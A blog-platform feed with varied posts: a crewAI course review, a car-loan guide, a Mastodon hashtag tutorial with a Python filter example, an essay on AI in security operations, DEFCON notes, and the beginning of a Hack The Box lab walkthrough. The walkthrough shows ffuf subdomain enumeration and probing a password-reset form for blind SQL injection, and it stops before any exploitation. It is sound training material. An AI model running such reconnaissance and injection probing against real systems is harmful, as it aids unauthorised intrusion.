Infosec Press

Reader

Read the latest posts from Infosec Press.

from Kevin Neely's Security Notes

I’ve been a “dabbler” with crewAI for a while now, having come across it in March of 2024 and tinkering when I have some time. I love the idea of task-based LLM actions that are specific enough that you can use lower cost but specifically-trained models for the tasks, even running those models on your own hardware. A few weeks back, my team at work used CrewAI for a hackathon in an effort to automate an onerous process, and it came out pretty well!

So, when I saw that they have a couple of official training videos on a new e-learning platform called DeepLearning.ai, I figured I’d check them out. #CrewAI is evolving rapidly, and some of the notes I’ve taken over the past 8 months aren’t even applicable anymore, so I figured this was a great way to level-set and fill in gaps in my knowledge.

I’m not going to describe CrewAI here, other than it’s a framework for easily building multi-agent teams and requires little to no coding experience. How CrewAI works is well-explained in the first fifteen minutes of the course, so at least listen to that part!

About the Course

The course, Multi AI Agent Systems with crewAI, follows a flow familiar to anyone who has taken online courses, and is taught by the creator of crewAI, João Moura. The lessons, ranging from a minute to 18 minutes, are a mix of descriptive lecture and hands-on coding. For the lessons where coding is involved, the window handily splits into two panes, one of which is an IPython notebook environment with the code pre-populated, so you can work through it as João explains what the code does.

You can also get an indication of the course and CrewAI by checking out my crewAI experimentation repo on GitHub.

Target Audience Analysis

Professionals working in project management, artificial intelligence, and team leadership can greatly enhance their skills in constructing multi-agent teams. Those keen on optimizing team performance, utilizing state-of-the-art technologies for collaborative work, and streamlining task execution processes would discover value in enrolling in specialized online classes tailored to augment their proficiency in this realm. Addressing prevalent challenges like steering diverse teams, accomplishing project goals in intricate scenarios, and keeping pace with evolving team dynamics is indispensable for professionals aiming to excel in their respective roles.

Content Outline

Introduction to Multi-Agent Teams

Familiarizing with the basics of multi-agent teams and their significance in managing complex tasks effectively.

Importance of Building Multi-Agent Teams for Complex Tasks

Unveiling the reasons why seamless collaboration among agents is crucial for successful task fulfillment.

Strategies for Creating Effective Multi-Agent Teams

Scrutinizing established methodologies for assembling and overseeing high-performing multi-agent teams.

Multi-Agent Crew Performance Examples

The bulk of the course is working through five clear examples of building multi-agent systems with CrewAI. The result is a set of real-world instances where multi-agent teams can perform and achieve remarkable results across diverse problems.

write_article

The first example is super simple: take a task you might do with a single prompt with an #LLM chatbot, such as ChatGPT, and have it performed by multiple agents, each with their own persona. This performs no research and the output is purely from the LLM, making it an easy entry point for anyone. (Hint: I had it write an article about taking an online course for developing multi-agent teams, and even incorporated a bit of it into this.)

  • This one required an update from the training to run on the latest version of crewAI.
  • Older versions of crewAI used an integer for the verbose declaration; if you are running the latest, you need to change that to a boolean, e.g. True.

This example is definitely one you’ll want to revisit after you learn how to use and assign tools to your agents in the following lessons.

customer_support

This creates a customer support agent that can answer questions about a specific product or service. It does this by accessing the URL with the support documentation.

customer_outreach

This example creates some marketing lead material to reach out to a specific company that is a potential customer or partner for a second company, i.e. “your” company.

event_planning

This example uses multiple agents to research and identify a venue, plan the logistics, and then create some marketing material for an event. It takes in parameters like city, size, and budget in order to find a viable venue.

  • I believe it was this one where I had to fiddle with the asynchronicity of the agents, since I understand that CrewAI needs the last task in the sequence to be performed synchronously. I could have that wrong, but I had to change that to make mine work.

This is actually a super-cool example, but I found that the LLMs did not adhere to the parameters, often getting venues too small or ignoring the input I would provide while they were performing their tasks. That’s to be expected, however, and I think experimentation is the name of the game when it comes to building these systems.

resume_builder

The final one was to have the agents create bespoke resumes, based upon the job one is applying for. As opposed to the event planning exercise, the output on this one was very good, and I was impressed with how well it could craft a resume for the specific job, as well as anticipate some of the interview questions and provide some hints for how to answer them.

Conclusion

This course provides a clear and thorough introduction to crewAI, bringing the attendees to an intermediate level of being able to use the framework. By immersing themselves in the intricacies of multi-agent team dynamics, professionals can acquire the requisite knowledge and proficiency to thrive in today's collaborative work settings. Embracing online classes tailored to address the subtleties of forming effective multi-agent teams represents a proactive stride towards honing essential skills and keeping abreast in the ever-dynamic professional sphere.

 

from stndinq

  • basic intro instructions for whisper transcription application – link
  • basic intro instructions for using yt-dlp to download media – link
 

from Jack Fortin

Tips for Getting the Best Car Loan Rates in British Columbia

Car Loan Rates in British Columbia

Getting the best BC auto loan rate might improve your finances. With changing interest rates and loan possibilities, it's important to know how to receive the best terms. This detailed guide will help you negotiate BC automobile financing and get the best vehicle loan rates.

1. Knowing BC Car Finance

Before applying for a vehicle loan, you must understand BC auto financing. Knowing the sorts of vehicle loans, interest rate considerations, and competing financial institutions is necessary. British Columbia vehicle finance includes online, credit union, and bank loans. Each option has benefits and downsides, and rates depend on credit history, loan amount, and term.

2. Improve Credit Score

Credit score is crucial to getting a cheap vehicle loan rate. Lenders evaluate creditworthiness and interest rates based on credit scores. Lower interest rates are characteristic of better credit scores.

3. BC Auto Loan Rates Compare

Compare BC auto loan rates from several lenders to get the best deals. Different lenders and financial profiles charge different interest rates. Compare rates from banks, credit unions, and internet lenders using web tools. Ask lenders about their rates and any specials or reductions.

4. Get BC Auto Loan Pre-Approval

Pre-approval for a BC auto loan may speed up car buying. A lender reviews your financial information to establish your maximum loan amount and interest rate before you start car shopping. Pre-approval defines your budget and attracts dealerships. It demonstrates that you're serious and can obtain financing, giving you negotiation leverage.

5. Consider Loan Term

The period of your auto loan affects your monthly payments and total interest. Longer loan periods may cut monthly payments but increase interest payments. Consider your budget and financial objectives when choosing a loan term. If you can afford larger monthly payments, a shorter loan period may save you money. If you require lower payments, a longer term may be easier but cost more.

6. Negotiate Car Loan Terms

Never be scared to negotiate your BC auto finance. Many lenders may provide better rates if you have strong credit and are pre-approved. Interest rate, loan period, and fees are negotiable. Being proactive and talking to lenders may get you a better rate or loan terms.

7. Can I Extend My Car Loan?

If you want a car loan extension, then you should examine the advantages and downsides first. Extended terms may lower monthly payments but increase interest charges throughout the loan's life. Discuss loan term extensions with your lender to determine their influence on loan expenses. Make sure the new terms fit your financial objectives and don't cause debt.

8. Read Your Loan Agreement Carefully

Before signing a vehicle loan, read the terms. Consider the interest rate, loan length, payment plan, and fees and penalties. Understanding your loan agreement helps you prevent surprises and hidden fees. Ask your lender for clarification if needed.

Conclusion

The best car loan rates in British Columbia require preparation and thought. Understanding how to get approved for a BC auto loan, boosting your credit score, comparing rates, and negotiating conditions may improve your loan prospects. Check the loan term and agreement to make sure they fit your financial objectives. With this advice you can better understand the vehicle loan process and locate the best financing plan.

 


from Sirius

For those just starting out on Mastodon, here are some explanations of why hashtags matter.

Image of hashtags

A hashtag is a word or phrase that, once preceded by the hash symbol (#) with no spaces, becomes a tag or label in the form of a hyperlink leading to a page with other posts on the same topic.

On Mastodon, as across the whole ActivityPub federation, understanding how these features work is essential, including for accessibility reasons.

Mastodon search bar

For technical privacy reasons, Mastodon was initially designed to allow only the following kinds of search:

  1. By hashtag (#example);
  2. People (@username@domain);
  3. URLs (links) of profiles and posts;

Mastodon now also allows plain-text search, but for users' posts to show up in it they have to opt in (so if you want the text of your public posts to be found in search, go to your account settings and enable that option).

Searching by hashtag is precise and covers everyone on instances federated with yours, whether or not you follow them, and without any algorithm influencing the results.

Note also that you can follow a hashtag, if it is a topic you are interested in, by clicking the button highlighted above. When you follow a hashtag, every post containing it from people on your instance or on instances federated with yours, whether you follow them or not, will appear in your home timeline.

Using Hashtags, and Some Notions of Respect

Hashtags, then, must start with a # and cannot contain certain special characters at the start or in the middle (period, space, at sign, asterisk, etc.).

The hashtag system currently does not distinguish accents, nor some of the special characters that are permitted, such as (ç), so the hashtags #política and #politica (without the accent on the i), or #paçoca and #pacoca, are merged by the platform's search.

If you want to search for a phrase, type it all as a single word, like #CatsOfMastodon.

If you want your post to be found more easily in searches, include plenty of relevant hashtags. There is no problem with using many of these tags; people understand they are necessary in this kind of search system.

Furthermore, the use of hashtags should respect an important accessibility issue. There are many blind users on Mastodon and in the Fediverse who use screen readers to convert text into audio.

So when posting hashtags there is a correct format, which is the method called CamelCase (where each word begins with a capital letter), for example #CatsOfMastodon instead of #catsofmastodon. The capital letters let screen-reader apps separate the words properly and read the hashtag aloud correctly.

It is also worth mentioning a very relevant hashtag in the Mastodon universe, the famous #Alt4Me.

When an image in a post has no description and the person who posted it added the hashtag #Alt4Me, it may mean that the author cannot add a description (for example, because of a disability) but is aware that one is needed, so they added the tag pre-emptively.

The hashtag #Alt4Me generally means that a blind person wants you to write a description of the image. Reply to the post with the hashtag and provide the description.

Note that the hashtag system does not distinguish between upper and lower case, so #CatsOfMastodon and #catsofmastodon are exactly the same thing for search purposes; the only benefit of following CamelCase is to provide a more accessible environment for blind people, which should be respected.

Hashtags and filters

Another important function of hashtags is that they let people who do not want to see posts about a given subject or topic use a filter that makes those posts invisible, without having to mute, block or unfollow a user.

When using Mastodon it is very important to understand that it is a social network that receives and welcomes people who have come from other, capitalist-owned social networks looking for a less toxic environment.

So there are topics that should be labelled with hashtags not only so that interested people can find them, but also so that people bothered by them can filter them out.

Let's take football as an example. I love the sport and have my team (Flamengo), but let's face it, there are people who see no appeal in it at all, and besides, there is a “football culture” in our country that is extremely problematic, including violence between supporters, sexism, homophobia and racism.

It costs nothing, therefore, to include the hashtag #futebol in your posts on the subject, or other hashtags for sensitive topics, such as #PolíticaPartidária.

Of course you also have the content warning tool, but I find the hashtag more effective, because it lets interested people find the post while those not interested can make it completely invisible without even having to read the content warning about the topic.

So here I explain how to filter hashtags.

In the side menu go to Preferences > Filters and then click Add Filter. The following screen opens:

Filters tab in Mastodon

The filter title, indicated by the red arrow, is, as the name says, just a title to help you find the filter in your list of filters.

The green arrow indicates the filter's expiry time (which can be permanent, as in the example). Sometimes you do not mind seeing something about football or politics, but during matches or during the election period you do not want to be flooded with posts on the topic, so you can create a filter with a temporary duration.

Under “Filter contexts” (pink rectangle) you choose where the filter will do its job of hiding posts; in the example I chose to hide posts from the home timeline and the public timelines, but you can filter more strictly if you prefer, also filtering user profiles and conversations.

Under “Filter action” you can choose whether the filtered post is shown to you behind a warning or disappears completely without any notification, as if the post had never existed.

Under “Keyword or phrase”, indicated by the yellow arrow at the bottom, you type the hashtag you want to filter.

After Save New Filter, the button indicated by the blue arrow, you will no longer see any post in your timeline or in the public timelines containing the selected hashtag (in our example: #futebol).

You can add as many filters as you like.
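The tag-folding and filtering behaviour described in this section, worked through as an added Python example; it is not Mastodon's own code and was not written by the post's author. It assumes a simplified hashtag grammar (a “#” followed by word characters), folds accents and cedillas by Unicode decomposition, and treats a “hide” filter as stronger than a “warn” filter when both match; the filters and sample posts are constructed for illustration.

```python
import re
import unicodedata
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Set, Tuple

# Hashtag grammar as the post describes it: '#' followed by word characters
# (letters including accented ones and 'ç', digits, underscore); the tag stops
# at a period, space, '@', '*' and similar punctuation. Assumption: Mastodon's
# real grammar is broader; this is an illustrative approximation.
HASHTAG_RE = re.compile(r"(?<!\w)#(\w+)")


def extract_hashtags(text: str) -> List[str]:
    """Return the hashtags in a post, without the leading '#'."""
    return HASHTAG_RE.findall(text)


def normalize_hashtag(tag: str) -> str:
    """Fold a tag the way the post says search treats it: accents and cedillas
    are dropped (NFKD decomposition, then combining marks removed) and case is
    ignored, so '#Política', '#politica' and '#POLITICA' share one key."""
    name = tag.lstrip("#")
    decomposed = unicodedata.normalize("NFKD", name)
    stripped = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return stripped.casefold()


def screen_reader_words(tag: str) -> List[str]:
    """Split a CamelCase tag into the words a screen reader can announce.
    A run-together lowercase tag comes back as a single unreadable chunk."""
    return re.findall(r"[A-Z][^A-Z]*|[^A-Z]+", tag.lstrip("#"))


@dataclass
class Filter:
    title: str                     # label shown in your filter list
    keyword: str                   # what you type under "Keyword or phrase"
    contexts: Set[str]             # "home", "public", "thread", "account", "notifications"
    action: str = "warn"           # "warn": post shown behind a notice; "hide": dropped entirely
    expires_at: Optional[datetime] = None   # None means permanent


def apply_filters(text: str, context: str, filters: List[Filter],
                  now: datetime) -> Tuple[str, Optional[str]]:
    """Decide what a timeline in `context` does with a post.

    Returns ("show", None), ("warn", <filter title>) or ("hide", <filter title>).
    Keywords are folded like search terms, so a filter on '#futebol' also
    catches '#Futebol'. "hide" wins over "warn" when several filters match."""
    tags = {normalize_hashtag(t) for t in extract_hashtags(text)}
    decision: Tuple[str, Optional[str]] = ("show", None)
    for f in filters:
        if f.expires_at is not None and now >= f.expires_at:
            continue                       # temporary filter has lapsed
        if context not in f.contexts:
            continue                       # filter not enabled for this timeline
        if normalize_hashtag(f.keyword) not in tags:
            continue
        if f.action == "hide":
            return ("hide", f.title)
        if decision[0] == "show":
            decision = ("warn", f.title)
    return decision


# Constructed sample data; not taken from any real Mastodon account.
NOW = datetime(2024, 10, 1, 12, 0, tzinfo=timezone.utc)
LATER = NOW + timedelta(days=3)
FILTERS = [
    Filter("Futebol", "#futebol", {"home", "public"}, action="hide"),
    Filter("Election", "#PolíticaPartidária", {"home"}, action="warn",
           expires_at=NOW + timedelta(days=2)),
]
SAMPLE_POSTS = [
    "Gol do Flamengo no fim do jogo! #Futebol #Flamengo",
    "Debate dos candidatos hoje à noite #politicapartidaria",
    "Meu gato dormindo no sol #CatsOfMastodon #Alt4Me",
]

if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print(apply_filters(post, "home", FILTERS, NOW), "<-", post)
    print(screen_reader_words("#CatsOfMastodon"), screen_reader_words("#catsofmastodon"))
```

Running it prints the decision for each sample post on the home timeline. The `screen_reader_words` helper shows the accessibility point above: #CatsOfMastodon splits into three words while #catsofmastodon does not, even though both fold to the same search key.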

Those were my thoughts on hashtags. I hope you enjoy them and create lots of interesting hashtags in the Brazilian Mastodon universe.

#Hashtag #MastoDicas #Mastodon #Tutorial

 

from Nicholas Spencer

The rapid advancement of generative AI is reshaping the cybersecurity industry. As AI capabilities grow exponentially, we're witnessing a swift evolution in how both defensive and offensive cybersecurity operations function. This transformation is not only changing the nature of cyber threats and defences but also significantly impacting the cybersecurity workforce.

AI in Defensive Cybersecurity

In the realm of defensive cybersecurity, AI is revolutionising how Security Operations Centres (SOCs) function, particularly in alert triage and investigation. Currently, SOC analysts face the repetitive task of sifting through countless alerts, many of which turn out to be false positives. This labour-intensive process has long been a bottleneck in effective threat response. However, the emergence of AI-powered services claiming to automate initial alert investigations is changing the game.

Traditionally, level-1 SOC analysts have been responsible for the initial triage, following established playbooks to investigate alerts and escalate when necessary. This repetitive work, while crucial, is ripe for automation. As AI systems become more sophisticated, it's increasingly likely that much of this level-1 work will be fully automated in the near future, with AI systems capable of escalating complex alerts to experienced human analysts when required.
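The playbook-driven level-1 flow described above (check each alert against a fixed set of rules, close the routine cases, escalate the rest to a human), as an added Python example rather than any vendor's product or the author's own code. The alert shapes, the authorised scanner subnet and the thresholds are assumptions chosen for illustration, and the alerts are constructed samples.

```python
import ipaddress
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed sample alerts in the shape a SIEM might hand to a tier-1 queue.
# None of these are real events, hosts or addresses.
SAMPLE_ALERTS: List[Dict] = [
    {"id": "A-1", "rule": "brute_force_login", "src_ip": "10.0.5.23",
     "user": "svc-backup", "failures": 12, "success_after": False},
    {"id": "A-2", "rule": "brute_force_login", "src_ip": "203.0.113.7",
     "user": "admin", "failures": 140, "success_after": True},
    {"id": "A-3", "rule": "port_scan", "src_ip": "10.0.9.10", "ports": 1200},
    {"id": "A-4", "rule": "malware_detected", "host": "wks-0042", "quarantined": True},
    {"id": "A-5", "rule": "dns_tunnelling_suspected", "host": "wks-0017", "queries": 900},
]

# Assumed environment knowledge the playbooks rely on: the subnet of the
# authorised vulnerability scanner. In a real SOC this comes from the CMDB.
KNOWN_SCANNER_NETS = [ipaddress.ip_network("10.0.9.0/24")]


@dataclass
class Decision:
    alert_id: str
    action: str   # "close" (automation handled it) or "escalate" (a human must look)
    tier: int     # 1 = automation, 2 = analyst, 3 = incident response
    reason: str   # every decision carries an auditable justification


def is_internal(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_private


def is_known_scanner(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in KNOWN_SCANNER_NETS)


def brute_force_playbook(a: Dict) -> Decision:
    # A success after a burst of failures is the one outcome never auto-closed.
    if a["success_after"]:
        return Decision(a["id"], "escalate", 3, "login succeeded after failures: possible account compromise")
    if is_internal(a["src_ip"]) and a["failures"] < 20:
        return Decision(a["id"], "close", 1, "low-volume internal failures, consistent with a stale service credential")
    return Decision(a["id"], "escalate", 2, "sustained brute force from outside; review and block the source")


def port_scan_playbook(a: Dict) -> Decision:
    if is_known_scanner(a["src_ip"]):
        return Decision(a["id"], "close", 1, "source is the authorised vulnerability scanner")
    return Decision(a["id"], "escalate", 2, "scanning from an unexpected source")


def malware_playbook(a: Dict) -> Decision:
    if a["quarantined"]:
        return Decision(a["id"], "close", 1, "EDR quarantined the file; follow up with a reimage ticket")
    return Decision(a["id"], "escalate", 3, "malware not contained on the host")


PLAYBOOKS: Dict[str, Callable[[Dict], Decision]] = {
    "brute_force_login": brute_force_playbook,
    "port_scan": port_scan_playbook,
    "malware_detected": malware_playbook,
}


def triage(alert: Dict) -> Decision:
    """Run the tier-1 playbook for the alert's rule. Anything without a
    playbook is escalated to a person rather than silently dropped."""
    handler = PLAYBOOKS.get(alert["rule"])
    if handler is None:
        return Decision(alert["id"], "escalate", 2, "no playbook for rule %r" % alert["rule"])
    return handler(alert)


def triage_queue(alerts: List[Dict]) -> List[Decision]:
    return [triage(a) for a in alerts]


if __name__ == "__main__":
    for d in triage_queue(SAMPLE_ALERTS):
        print(f"{d.alert_id}: {d.action} (tier {d.tier}) - {d.reason}")
```

Whether the playbook is executed by an analyst or by a model, the properties worth keeping are the ones this skeleton makes explicit: every closure carries a reason that can be audited later, a successful login after a burst of failures is never auto-closed, and an alert the system has no playbook for goes to a human instead of disappearing.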

AI in Offensive Cybersecurity

On the offensive side, AI is already making significant waves in how penetration testing and vulnerability assessments are conducted. AI-powered tools are automating many aspects of basic penetration testing. These sophisticated systems can efficiently scan for running services and exploit known vulnerabilities, tasks that previously required significant human intervention. Moreover, these AI tools are adept at examining websites and identifying a wide range of vulnerabilities, including those listed in the OWASP Top 10 – a critical benchmark in web application security.

Even in scenarios where AI tools can't autonomously exploit applications, they're proving to be invaluable assistants to human penetration testers. This AI augmentation is a game-changer, potentially elevating a novice penetration tester to perform at the level of someone with years of experience. For seasoned professionals, AI acts as a capability multiplier, enabling them to uncover more complex vulnerabilities and delve deeper into system weaknesses.

The AI Arms Race in Cybersecurity

The rapid growth in AI capabilities is evident in both defensive and offensive security domains. While major AI model creators are implementing safeguards to limit their systems' ability to assist with cybersecurity exploitation, numerous other models exist without such restrictions. This proliferation of unrestricted AI tools raises significant concerns about their potential misuse by malicious actors.

The same AI-powered tools that enhance the capabilities of ethical penetration testers and defensive analysts could equally empower cyber criminals. This dual-use nature of AI in cybersecurity is leading towards what appears to be an AI-driven arms race. On one side, AI will be leveraged to bolster system defences, automate alert triage, and uncover vulnerabilities for patching. On the other, it will be weaponised to launch more sophisticated attacks that are harder to detect and remediate.

Impact on the Cybersecurity Workforce

While this automation of cyber defence promises increased efficiency and potentially improved threat response times, it also raises concerns about the future of the cybersecurity workforce, particularly entry-level roles. As AI takes over many tasks traditionally performed by junior analysts and penetration testers, we may see a significant reduction in entry-level positions, which have long served as a crucial stepping stone for aspiring cybersecurity professionals.

This shift could potentially exacerbate the existing cybersecurity skills gap. With fewer entry-level positions available, it may become increasingly challenging for interested individuals to gain the hands-on experience necessary to progress in the field. This bottleneck could lead to a shortage of mid-level and senior professionals in the long term, as the traditional career pipeline is disrupted.

However, it's important to note that as AI brings new efficiencies to cybersecurity, it also introduces new threats and challenges. The cybersecurity landscape is evolving rapidly, with AI-powered attacks becoming more sophisticated and prevalent. This evolution will inevitably create new roles and specialisations within the field, potentially offsetting some of the job losses in existing areas.

The Future of Cybersecurity

As we stand on the brink of this new era in cybersecurity, it's clear that AI will play a pivotal role in shaping the future of the field. The exact shape of the cybersecurity workforce remains uncertain. While AI will undoubtedly automate many current tasks, it will also create new opportunities and challenges that require human expertise.

While AI tools are making certain aspects of cybersecurity more accessible, they're also raising the bar for what constitutes advanced skills in both defensive and offensive security. Professionals in this field will need to adapt quickly, learning to work alongside AI tools effectively while also staying ahead of AI threats.

The key for professionals and students in this field will be to stay adaptable, continuously learning and evolving their skills to remain relevant in this AI augmented landscape. Embracing these new tools responsibly, using them to enhance our defensive capabilities while also preparing for the inevitable rise in AI assisted cyber attacks, will be crucial for the future of cybersecurity.

Disclaimer: While I developed the ideas and topics of this post, I used Claude AI (Sonnet 3.5) as a tool to help format and structure it for clarity and coherence.

 

from Tai Lam in Science

I think I'm overthinking this. I think I'll follow the instructions for Secure Boot for the Linux Surface project and see how that goes.

The GitHub project's wiki references following the steps outlined in the ArchWiki.

Additionally, I came across the following sources:

  • Super User thread from Stack Exchange
  • GitHub gist from July 2022
  • A blog post from January 2022

I haven't been able to sit down and try this — but expect that this worked if I don't come back to follow up.

 

from Tai Lam in Science

About three days ago, I was reading federal government online sources about online job scams.

There is a resource page from the FTC and another FTC page to report online scams, as well as the Internet Crime Complaint Center (IC3) page from the FBI.

Conclusion

Most traditional jobs don't advertise on Craigslist. I almost got burned, but luckily I smoked this scam out before I could even apply for it.

The particular one I was looking at struck me as strange, as it has been the only Craigslist posting (of any type) that didn't use Craigslist's private e-mail relay/address option. Due to this, I kept looking at the e-mail address (as it was a Yahoo e-mail address, instead of an official e-mail address from a real American healthcare corporation) until I realized I was looking at a scam — it was very much like looking at a very well camouflaged animal for a long time before spotting it.

An offer that's “too good to be true” doesn't have to be hyperbolically exaggerated to the point of being comical and super obvious — it can also be a toned-down, realistic decoy.

Also, it is a good rule of thumb to cross-reference and check if the same online job listing you've stumbled upon on an aggregate site (such as Craigslist or Indeed) can be found on a better first-party source, such as the company website.

 

from Tai Lam in Science

eBay is sometimes tedious to deal with. I use the site to buy electronic parts for repair, but some aspects of the site are annoying to deal with.

For example, if you use a password manager, then you should wait a few seconds (at least 5 seconds, if I had to pick a number) before submitting your password. (Then, you will be prompted with an hCaptcha, if you are using a VPN; followed by an SMS message for 2FA.)

I received an error message, identical to that described in an EcommerceBytes article from January 2021. I think this was because I tried to log in very quickly, assisted by KeePassXC.

This YouTube video from August 2023 also shows the rate limiting.

This is sort of annoying, as checking my order status on eBay is currently my only way to check the shipping status of orders, since even the U.S. Postal Service completely blocks VPNs (at least Mullvad VPN) when I tried doing this about two days ago.

 

from Tai Lam on a Bike

There is a site called Read Comic Online, which I first saw on a fellow student's laptop during my last year of undergraduate studies.

(This site is definitely violating copyright, but on the other hand there is probably no pragmatic way I could buy physical copies of any of the Stranger Things comics when I started reading those, except in collected book versions; though I'd have to go to the library to read those. Also, I have yet to explore in-person comic book stores.)

In early 2024, I was browsing the site when I discovered the webcomic Kill Six Billion Demons (or KSBD).

Fair warning: if you thought that reading a Boruto chapter monthly (or a Naruto manga chapter back during its publication run) was painful, then the anticipation of waiting for each page of KSBD to be released might be too much for you.

Anyways, I somehow started reading the middle of the series online and quickly read through all the books available on Read Comic Online. As some context: it has been a while since the series has collected the later books into print form with Image Comics, so you can get a lot further into the story by reading the webcomic.

I was immediately hooked. But then I went to the actual KSBD website and realized I had no idea what was happening in the story, as the webcomic site is much further along than the completed print books available on Read Comic Online. So, I caught up with the story, as of early 2024.

I was initially shocked at the outer appearance of protagonist Allison when I first opened the KSBD webcomic site. Initially, she was drawn in a way that made me believe she was a villain, which was not the case and at first confused me. However, after catching up with the story, I understand how Allison came to her current state in the story.

I just wanted to talk about KSBD, as there is not much (meta-)explanatory material on KSBD generally online, except for rather obscure places — such as the comments under each page of KSBD.

 

from Kevin Neely's Security Notes

Critiques

  • The venue was too bright. Chillout rooms and talk tracks could have used a dimmer.
  • Speaking of the Chillout room, it was somewhat disappointing. (I’m talking about Chillout 2, as Chillout 1 felt like a giant hospital waiting room). I like a cavernous, dim, and ambient room for, you know, chilling out. #SomaFM was over in the hallway, the Chillout room had a live stage, and it was overall pretty small.

“Best-ofs”

These are the best things I personally saw or was close to. There’s so much going on that this just represents the best stuff I saw in my fractional DEFCON experience.

  • Best thing I learned: Gained a good bit of familiarity with InspectAI at the AI Village as a part of their CTF.
  • Best Talk: “Librarian in Broad Daylight: Fighting back against ever encroaching capitalism” by the Cyberpunk Librarian in the War Stories track.
  • Best Rant: Cory Doctorow on #enshittification
  • Best Tool or Technique: “MySQL honeypot that drops shells”
  • Best Research: “Watchers being watched: Exploiting the Surveillance System” in which the researchers exploited 4 different surveillance systems.
  • Best Real-World Impact: “Bastardo Grande: Hunting the Largest Black Market Bike Fence In The World” by Bryan Hance. Talk not up yet, see the related Wired article
  • Best Contest: There’s too many, but I loved the idea of Sn4ck3r, the machine that vends real items for captured flags.
  • Best Party: the 503 Party, of course!
  • Best Entertainment: DJ Jackalope brought an awesome set after Hacker Jeopardy. (and Skittish and Bus did a great job warming up the crowd just before)
  • Biggest Drama: the badge
  • Best Village: The Packet Hacking village due to the supreme DEFCON-y ambience and the well-run workshops they provided to people of all skill levels

Observations & Random Points

  1. I probably haven’t been to a main track talk in person for over 6 years. I decided to go to a few of them and really enjoyed the atmosphere. I’ll have to remember to put at least 2 on the agenda each year going forward.
  2. BlueTeam Village got a much larger space this year. I’m happy to see that, as they were nearly impossible to get into over at the Flamingo in recent years. BTV is doing good work and people should be able to experience it.
  3. There were a lot of contests.
  4. The Car-hacking village really brings it. They had a semi truck rig, a Rivian, and they gave away a Tesla. Well done, and my only ask is that we make it easier for people & mechanics to jailbreak their cars when the companies John Deere-ify them.

Next #DEFCON will be held Aug 7-10, 2025 at the LVCC. I hope to see you there!

 

from Tai Lam on a Bike

East of West is probably the best self-contained story I've read recently in the general genre of comic series, graphic novel, and manga. It's longer than one collected book, yet isn't a series that feels like it's going on forever, such as Naruto or Boruto.

I will say that the very end of East of West seems to be relatively anticlimactic compared to how it starts, yet it is still better than the ending of the original Matrix film trilogy.

Regardless, East of West still ends way better than The Empty Man, which I felt started really well but then ended in a rather mediocre fashion — much like the Matrix trilogy.

I sort of wish that the comic series Godslap, which was co-created by MoistCr1TiKaL, would be released more frequently, as well as the comic series Outlast: The Murkoff Account and the vampire comic series Sucker.

(Though, to be fair, the continuation of the Murkoff Outlast comic that I am invested in can't finish anytime soon, as the game Outlast III hasn't been released yet.)

Apparently, as of November 2023, the third and final volume of Sucker is in production. I really liked this one because it had some rather sharp social commentary on Big Pharma... maybe too sharp, given that Volume 2 was released in March 2020, when the COVID-19 pandemic really started in the US.

(The following links are probably NSFW-risky links, though not completely explicit, for the Sucker comic: Volume 1 and Volume 2 are published by Polite Strangers. This series was originally crowdfunded on Kickstarter and IndieGoGo — I was able to find these links despite some difficulty.)

Conclusion

From my experiences, I think most time reading comic books and graphic novels should be done alone. It's how I discovered all of these unique stories that almost no one in mainstream media outlets (both in TV and film) would even consider exploring. It's not just online ARGs, analog horror, and SCP Foundation-esque entries that have more wildly creative ideas than even the most unfiltered indie film and TV projects.

I think some of my formative time spent in public libraries was reading graphic novels alone. You learn by osmosis how to form your own opinion regarding media literacy.

I would love to see The Private Eye comic adapted into an A24-like two-part miniseries, as it finished serialization by December 2015 and is really prescient in a post-Snowden era and the post-COVID technology chilling. The screenplay and basic storyboard are at least 50% towards an MVP of a screenplay script, if you think about it.

Also, adapting Xombi Volume 2 as a stand-alone three-part miniseries for the character Xombi would be my highest personal cinematic adaptation goal. I think DC could consider exploring some “experimental” media entries, similar to the 2022 Werewolf by Night film special from Marvel, as much of its cinematic and television output is pretty disconnected already.

I mean, Spider-Man: Homecoming completely avoided redoing Tom Holland's being bitten by the spider and yet the film did just fine. So, we wouldn't have to trudge through David Kim's origin story. If your story is good, then it's good. A superhero-like character doesn't always have to be an origin story to have a compelling story.

Lastly, there is some music (just two tracks) that was created for East of West, which is available on Bandcamp at a cost of “name your price” (including free).

Really random and funny postscript

Speaking of Bandcamp: Nathan Barnatt, the IRL actor who plays the character Dad, also has a Bandcamp for all of the original music and songs created for the Dad series.

 

from 0x2501

Intro

Usage is a retired, easy-rated box on Hack The Box. It features blind SQL injection, the exploitation of a vulnerable Laravel plugin, hash cracking and a 7z wildcard trick.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The web server redirects to usage.htb, which I added to /etc/hosts. I then started subdomain enumeration with ffuf; the -fw 6 filter hides the server's default response for unknown hosts, which is six words long.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I had a look at the base domain. I tested the account-creation form for basic SQL injection, mainly by inputting single quotes, and found nothing. I then created an account and tested the /forgot-password endpoint with the same basic techniques. Inputting a ' returned a 500 Internal Server Error, which made me believe I had found a blind SQL injection: the input is reaching the query parser, and the only feedback is whether the query succeeded.
